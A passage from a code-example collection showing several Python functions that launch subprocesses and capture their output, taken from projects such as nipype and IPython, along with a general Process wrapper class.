            output_reader.join()
            data = output_reader.data

            # if a stop or abort exception was raised, stop the bash process and re-raise
            if output_reader.exc_obj is not None:
                if proc.poll() is None:
                    proc.terminate()
                raise output_reader.exc_obj

        # send a notification that the process has completed
        if self._callback_end is not None:
            if stdout_file is not None:
                stdout_file.seek(0)
            if stderr_file is not None:
                stderr_file.seek(0)

            self._callback_end(proc.returncode, stdout_file, stderr_file, data,
                               store, signal, context)

        if stdout_file is not None:
            stdout_file.close()

        if stderr_file is not None:
            stderr_file.close()

        return Action(data)
示例#57
0
    def run_command(self, cmd, check_code=True):
        """ Run command sequence `cmd` returning exit code, stdout, stderr

        Parameters
        ----------
        cmd : str or sequence
            string with command name or sequence of strings defining command
        check_code : {True, False}, optional
            If True, raise error for non-zero return code

        Returns
        -------
        returncode : int
            return code from execution of `cmd`
        stdout : bytes (python 3) or str (python 2)
            stdout from `cmd`
        stderr : bytes (python 3) or str (python 2)
            stderr from `cmd`
        """
        if isinstance(cmd, string_types):
            cmd = [cmd]
        else:
            cmd = list(cmd)
        if self.local_script_dir is not None:
            # Windows can't run script files without extensions
            # natively so we need to run local scripts (no extensions)
            # via the Python interpreter.  On Unix, we might have the
            # wrong incantation for the Python interpreter
            # in the hash bang first line in the source file. So, either way,
            # run the script through the Python interpreter
            cmd = [sys.executable,
                   pjoin(self.local_script_dir, cmd[0])] + cmd[1:]
        elif os.name == 'nt':
            # Need .bat file extension for windows
            cmd[0] += '.bat'
        if os.name == 'nt':
            # Quote any arguments with spaces. The quotes delimit the arguments
            # on Windows, and the arguments might be files paths with spaces.
            # On Unix the list elements are each separate arguments.
            cmd = ['"{0}"'.format(c) if ' ' in c else c for c in cmd]
        if self.debug_print:
            print("Running command '%s'" % cmd)
        env = os.environ
        if self.local_module_dir is not None:
            # module likely comes from the current working directory.
            # We might need that directory on the path if we're running
            # the scripts from a temporary directory
            env = env.copy()
            pypath = env.get('PYTHONPATH', None)
            if pypath is None:
                env['PYTHONPATH'] = self.local_module_dir
            else:
                env['PYTHONPATH'] = self.local_module_dir + pathsep + pypath
        proc = Popen(cmd, stdout=PIPE, stderr=PIPE, env=env)
        stdout, stderr = proc.communicate()
        if proc.poll() is None:
            proc.terminate()
        if check_code and proc.returncode != 0:
            raise RuntimeError(
                """Command "{0}" failed with
                stdout
                ------
                {1}
                stderr
                ------
                {2}
                """.format(cmd, stdout, stderr))
        opp = self.output_processor
        return proc.returncode, opp(stdout), opp(stderr)
示例#58
0
def run_command(runtime, output=None, timeout=0.01):
    """Run a command, read stdout and stderr, prefix with timestamp.

    The returned runtime contains a merged stdout+stderr log with timestamps
    """

    # Init variables
    cmdline = runtime.cmdline
    env = canonicalize_env(runtime.environ)

    errfile = None
    outfile = None
    stdout = PIPE
    stderr = PIPE

    if output == "file":
        outfile = os.path.join(runtime.cwd, "output.nipype")
        stdout = open(outfile, "wb")  # t=='text'===default
        stderr = STDOUT
    elif output == "file_split":
        outfile = os.path.join(runtime.cwd, "stdout.nipype")
        stdout = open(outfile, "wb")
        errfile = os.path.join(runtime.cwd, "stderr.nipype")
        stderr = open(errfile, "wb")
    elif output == "file_stdout":
        outfile = os.path.join(runtime.cwd, "stdout.nipype")
        stdout = open(outfile, "wb")
    elif output == "file_stderr":
        errfile = os.path.join(runtime.cwd, "stderr.nipype")
        stderr = open(errfile, "wb")

    proc = Popen(
        cmdline,
        stdout=stdout,
        stderr=stderr,
        shell=True,
        cwd=runtime.cwd,
        env=env,
        close_fds=(not sys.platform.startswith("win")),
    )

    result = {
        "stdout": [],
        "stderr": [],
        "merged": [],
    }

    if output == "stream":
        streams = [
            Stream("stdout", proc.stdout),
            Stream("stderr", proc.stderr)
        ]

        def _process(drain=0):
            try:
                res = select.select(streams, [], [], timeout)
            except select.error as e:
                iflogger.info(e)
                if e[0] == errno.EINTR:
                    return
                else:
                    raise
            else:
                for stream in res[0]:
                    stream.read(drain)

        while proc.returncode is None:
            proc.poll()
            _process()

        _process(drain=1)

        # collect results, merge and return
        result = {}
        temp = []
        for stream in streams:
            rows = stream._rows
            temp += rows
            result[stream._name] = [r[2] for r in rows]
        temp.sort()
        result["merged"] = [r[1] for r in temp]

    if output.startswith("file"):
        proc.wait()
        if outfile is not None:
            stdout.flush()
            stdout.close()
            with open(outfile, "rb") as ofh:
                stdoutstr = ofh.read()
            result["stdout"] = read_stream(stdoutstr, logger=iflogger)
            del stdoutstr

        if errfile is not None:
            stderr.flush()
            stderr.close()
            with open(errfile, "rb") as efh:
                stderrstr = efh.read()
            result["stderr"] = read_stream(stderrstr, logger=iflogger)
            del stderrstr

        if output == "file":
            result["merged"] = result["stdout"]
            result["stdout"] = []
    else:
        stdout, stderr = proc.communicate()
        if output == "allatonce":  # Discard stdout and stderr otherwise
            result["stdout"] = read_stream(stdout, logger=iflogger)
            result["stderr"] = read_stream(stderr, logger=iflogger)

    runtime.returncode = proc.returncode
    try:
        proc.terminate()  # Ensure we are done
    except OSError as error:
        # Python 2 raises when the process is already gone
        if error.errno != errno.ESRCH:
            raise

    # Dereference & force GC for a cleanup
    del proc
    del stdout
    del stderr
    gc.collect()

    runtime.stderr = "\n".join(result["stderr"])
    runtime.stdout = "\n".join(result["stdout"])
    runtime.merged = "\n".join(result["merged"])
    return runtime
示例#59
0
文件: script.py 项目: zoeang/ipython
    def shebang(self, line, cell):
        """Run a cell via a shell command
        
        The `%%script` line is like the #! line of script,
        specifying a program (bash, perl, ruby, etc.) with which to run.
        
        The rest of the cell is run by that program.
        
        Examples
        --------
        ::
        
            In [1]: %%script bash
               ...: for i in 1 2 3; do
               ...:   echo $i
               ...: done
            1
            2
            3
        """
        argv = arg_split(line, posix=not sys.platform.startswith('win'))
        args, cmd = self.shebang.parser.parse_known_args(argv)

        try:
            p = Popen(cmd, stdout=PIPE, stderr=PIPE, stdin=PIPE)
        except OSError as e:
            if e.errno == errno.ENOENT:
                print("Couldn't find program: %r" % cmd[0])
                return
            else:
                raise

        if not cell.endswith('\n'):
            cell += '\n'
        cell = cell.encode('utf8', 'replace')
        if args.bg:
            self.bg_processes.append(p)
            self._gc_bg_processes()
            to_close = []
            if args.out:
                self.shell.user_ns[args.out] = p.stdout
            else:
                to_close.append(p.stdout)
            if args.err:
                self.shell.user_ns[args.err] = p.stderr
            else:
                to_close.append(p.stderr)
            self.job_manager.new(self._run_script,
                                 p,
                                 cell,
                                 to_close,
                                 daemon=True)
            if args.proc:
                self.shell.user_ns[args.proc] = p
            return

        try:
            out, err = p.communicate(cell)
        except KeyboardInterrupt:
            try:
                p.send_signal(signal.SIGINT)
                time.sleep(0.1)
                if p.poll() is not None:
                    print("Process is interrupted.")
                    return
                p.terminate()
                time.sleep(0.1)
                if p.poll() is not None:
                    print("Process is terminated.")
                    return
                p.kill()
                print("Process is killed.")
            except OSError:
                pass
            except Exception as e:
                print("Error while terminating subprocess (pid=%i): %s" \
                    % (p.pid, e))
            return
        out = py3compat.decode(out)
        err = py3compat.decode(err)
        if args.out:
            self.shell.user_ns[args.out] = out
        else:
            sys.stdout.write(out)
            sys.stdout.flush()
        if args.err:
            self.shell.user_ns[args.err] = err
        else:
            sys.stderr.write(err)
            sys.stderr.flush()
        if args.raise_error and p.returncode != 0:
            raise CalledProcessError(p.returncode,
                                     cell,
                                     output=out,
                                     stderr=err)
示例#60
0
class Process(object):
    ''' Represents a running/ran process '''

    @staticmethod
    def devnull():
        ''' Helper method for opening devnull '''
        return open('/dev/null', 'w')

    @staticmethod
    def call(command, cwd=None, shell=False):
        '''
            Calls a command (either string or list of args).
            Returns tuple:
                (stdout, stderr)
        '''
        if type(command) is not str or ' ' in command or shell:
            shell = True
            if Configuration.verbose > 1:
                Color.pe('\n {C}[?] {W} Executing (Shell): {B}%s{W}' % command)
        else:
            shell = False
            if Configuration.verbose > 1:
                Color.pe('\n {C}[?]{W} Executing: {B}%s{W}' % command)

        pid = Popen(command, cwd=cwd, stdout=PIPE, stderr=PIPE, shell=shell)
        pid.wait()
        (stdout, stderr) = pid.communicate()

        # Python 3 compatibility
        if type(stdout) is bytes:
            stdout = stdout.decode('utf-8')
        if type(stderr) is bytes:
            stderr = stderr.decode('utf-8')

        if Configuration.verbose > 1 and stdout is not None and stdout.strip() != '':
            Color.pe('{P} [stdout] %s{W}' %
                     '\n [stdout] '.join(stdout.strip().split('\n')))
        if Configuration.verbose > 1 and stderr is not None and stderr.strip() != '':
            Color.pe('{P} [stderr] %s{W}' %
                     '\n [stderr] '.join(stderr.strip().split('\n')))

        return (stdout, stderr)

    @staticmethod
    def exists(program):
        ''' Checks if program is installed on this system '''
        p = Process(['which', program])
        stdout = p.stdout().strip()
        stderr = p.stderr().strip()

        if stdout == '' and stderr == '':
            return False

        return True

    def __init__(self, command, devnull=False, stdout=PIPE, stderr=PIPE, cwd=None, bufsize=0, stdin=PIPE):
        ''' Starts executing command '''

        if type(command) is str:
            # Commands have to be a list
            command = command.split(' ')

        self.command = command

        if Configuration.verbose > 1:
            Color.pe('\n {C}[?] {W} Executing: {B}%s{W}' % ' '.join(command))

        self.out = None
        self.err = None
        if devnull:
            sout = Process.devnull()
            serr = Process.devnull()
        else:
            sout = stdout
            serr = stderr

        self.start_time = time.time()

        self.pid = Popen(command, stdout=sout, stderr=serr,
                         stdin=stdin, cwd=cwd, bufsize=bufsize)

    def __del__(self):
        '''
            Ran when object is GC'd.
            If process is still running at this point, it should die.
        '''
        try:
            if self.pid and self.pid.poll() is None:
                self.interrupt()
        except AttributeError:
            pass

    def stdout(self):
        ''' Waits for process to finish, returns stdout output '''
        self.get_output()
        if Configuration.verbose > 1 and self.out is not None and self.out.strip() != '':
            Color.pe('{P} [stdout] %s{W}' %
                     '\n [stdout] '.join(self.out.strip().split('\n')))
        return self.out

    def stderr(self):
        ''' Waits for process to finish, returns stderr output '''
        self.get_output()
        if Configuration.verbose > 1 and self.err is not None and self.err.strip() != '':
            Color.pe('{P} [stderr] %s{W}' %
                     '\n [stderr] '.join(self.err.strip().split('\n')))
        return self.err

    def stdoutln(self):
        return self.pid.stdout.readline()

    def stderrln(self):
        return self.pid.stderr.readline()

    def stdin(self, text):
        if self.pid.stdin:
            self.pid.stdin.write(text.encode('utf-8'))
            self.pid.stdin.flush()

    def get_output(self):
        ''' Waits for process to finish, sets stdout & stderr '''
        if self.pid.poll() is None:
            self.pid.wait()
        if self.out is None:
            (self.out, self.err) = self.pid.communicate()

        if type(self.out) is bytes:
            self.out = self.out.decode('utf-8')

        if type(self.err) is bytes:
            self.err = self.err.decode('utf-8')

        return (self.out, self.err)

    def poll(self):
        ''' Returns exit code if process is dead, otherwise 'None' '''
        return self.pid.poll()

    def wait(self):
        self.pid.wait()

    def running_time(self):
        ''' Returns number of seconds since process was started '''
        return int(time.time() - self.start_time)

    def interrupt(self, wait_time=2.0):
        '''
            Send interrupt to current process.
            If process fails to exit within `wait_time` seconds, terminates it.
        '''
        try:
            pid = self.pid.pid
            cmd = self.command
            if type(cmd) is list:
                cmd = ' '.join(cmd)

            if Configuration.verbose > 1:
                Color.pe(
                    '\n {C}[?] {W} sending interrupt to PID %d (%s)' % (pid, cmd))

            os.kill(pid, signal.SIGINT)

            start_time = time.time()  # Time since Interrupt was sent
            while self.pid.poll() is None:
                # Process is still running
                time.sleep(0.1)
                if time.time() - start_time > wait_time:
                    # We waited too long for process to die, terminate it.
                    if Configuration.verbose > 1:
                        Color.pe(
                            '\n {C}[?] {W} Waited > %0.2f seconds for process to die, killing it' % wait_time)
                    os.kill(pid, signal.SIGTERM)
                    self.pid.terminate()
                    break

        except OSError as e:
            if 'No such process' in e.__str__():
                return
            raise e  # process cannot be killed